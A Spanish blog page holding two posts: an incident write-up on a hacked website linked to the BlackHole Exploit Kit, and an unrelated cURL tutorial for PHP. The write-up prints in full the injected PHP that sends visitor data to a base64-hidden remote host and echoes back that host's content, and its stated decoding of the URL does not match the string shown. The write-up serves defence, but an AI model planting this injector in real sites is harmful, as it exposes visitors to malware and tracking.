Web Hackeada (BlackHole Exploit Kit)

diciembre 5, 2012

He estado estos dos últimos días revisando la web de un cliente que había sido Hackeada. Los antivirus de varios de sus usuarios les saltaban con el aviso de amenaza de tipo BlackHole Exploit Kit y abortaban la conexión.

Tras revisar el log del servidor y comprobar varias entradas por FTP de una dirección procedente de Canadá, revisé los archivos que parecían haber sido modificados por este intruso. En este caso, varios archivos index.php situados en distintos directorios del servidor.

En todos estos archivos se había incluido este pedazo de código PHP.

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER[‘HTTP_USER_AGENT’]); //  Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = “”;
if((strstr($sUserAgent, ‘google’) == false)&&(strstr($sUserAgent, ‘yahoo’) == false)&&(strstr($sUserAgent, ‘baidu’) == false)&&(strstr($sUserAgent, ‘msn’) == false)&&(strstr($sUserAgent, ‘opera’) == false)&&(strstr($sUserAgent, ‘chrome’) == false)&&(strstr($sUserAgent, ‘bing’) == false)&&(strstr($sUserAgent, ‘safari’) == false)&&(strstr($sUserAgent, ‘bot’) == false)) // Bot comes
{
if(isset($_SERVER[‘REMOTE_ADDR’]) == true && isset($_SERVER[‘HTTP_HOST’]) == true){ // Create  bot analitics
$stCurlLink = base64_decode( ‘aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==’).’?ip=’.urlencode($_SERVER[‘REMOTE_ADDR’]).’&useragent=’.urlencode($sUserAgent).’&domainname=’.urlencode($_SERVER[‘HTTP_HOST’]).’&fullpath=’.urlencode($_SERVER[‘REQUEST_URI’]).’&check=’.isset($_GET[‘look’]);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]==”O”)
{$sResult[0]=” “;
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

El texto codificado en Base64  aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA contiene esta dirección [http://hotlogupdate.com/stat/stat.php]

En este caso, el código es facilmente reconocible. En otras ocasiones el código incluido es un javascript ofuscado bastante mas dificil de detectar.

Si vuestra web es hackeada e infectada por este u otro tipo de código malicioso es recomendable que toméis las siguientes medidas aparte de eliminar el molesto código claro …

1. Cambiar las credenciales de acceso al panel de control del Alojamiento (plesk, cpanel …)

2. Cambiar las credenciales de la cuenta FTP

3. Revisar los equipos desde los que se ha accedido con la cuenta FTP cuyas credenciales parecen haber sido sustraidas en busca de algún tipo de Troyano que el hacker haya podido utilizar para sustraerlas.

 

Anuncios

Utilización de cURL en lugar de allow_url_fopen

mayo 29, 2009

Puede darse el caso de que, por motivos de seguridad, el servidor en el que vayamos a alojar nuestras aplicaciones PHP tenga deshabilitada la directiva allow_url_fopen en la configuración PHP.

La directiva allow_url_fopen permite, cuando su valor está en “On”, pasar urls (http, ftp) a la función fopen(), en lugar de la ubicacion física del archivo. Por motivos de seguridad, esta directiva puede (y seguramente debe) estar deshabilitada.

En un primer intento de resolver el asunto sin tener que editar el php.ini se nos puede ocurrir utilizar la función ini_set() para cambiar a On el valor de allow_url_fopen durante la ejecución del Script. Teóricamente podríamos hacerlo de cualquiera de estas dos formas:

ini_set(allow_url_fopen, ‘On’);
ini_set(allow_url_fopen, ‘1’);

Sin embargo, en la práctica, esta directiva no puede ser cambiada de este modo debido a que a partir de la versión 4.3.4 de PHP, este valor de configuración solo se puede especificar a nivel global en los archivos de configuración php.ini ó httpd.conf

Pero no nos demos por vencidos porque, desde su versión 4.0.2, PHP soporta Libcurl, una biblioteca creada por Daniel Stenberg, que permite conectar y comunicar a diferentes tipos de servidores con diferentes tipos de protocolos ( http, https, ftp, gopher, telnet, dict, archivo y protocolos LDAP). Podremos, por ejemplo, obtener el contenido de una web, extraer datos XML o transferir archivos de servidores FTP.

Una vez nos hayamos asegurado de que el PHP de nuestro servidor está compilado con soporte cURL podremos empezar a utilizar las funciones de la librería libcurl para PHP.

Aquí os dejo un ejemplo en el que utilizo cURL para acceder al xml que la API de youtube nos ofrece, en este caso, al solicitar el listado de videos de determinado usuario.


<?php
$feedURL = "http://gdata.youtube.com/feeds/api/users/tu_usuario/uploads";

//Iniciamos la variable $returnStr, donde almacenaremos el String devuelto por la funcion curl_exec();
$returnStr = "";

//inicializa una nueva sesión y devuelve un recurso CURL para ser usado con las funciones curl_setopt(), curl_exec(), y curl_close()
$curl = curl_init();

//La URL que se quiere obtener. También se puede establecer su valor al inicializar una sesión con la función curl_init().
curl_setopt($curl, CURLOPT_URL, $feedURL);

//TRUE para devolver el resultado como una cadena de texto que contiene el valor devuelto por la función curl_exec(), en vez de mostrar la salida directamente en la ventana del navegador.
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

//FALSE para que el encabezado no se incluya en la salida.
curl_setopt($curl, CURLOPT_HEADER, false);

//Esta función debe ser llamada después de inicializar una sesión CURL y fijar todas las opciones para la misma. Su propósito es simplemente el de ejecutar la sesión CURL indicada por el parámetro ch .
$returnStr = curl_exec($curl);

//Cerramos la sesión CURL
curl_close($curl);
?>

Glosario:
curl. Herramienta de linea de comandos para la transferencia de archivos.
libcurl. Libreria multiplataforma que permite la transferencia de archivos desde el lado del cliente y a través de múltiples protocolos.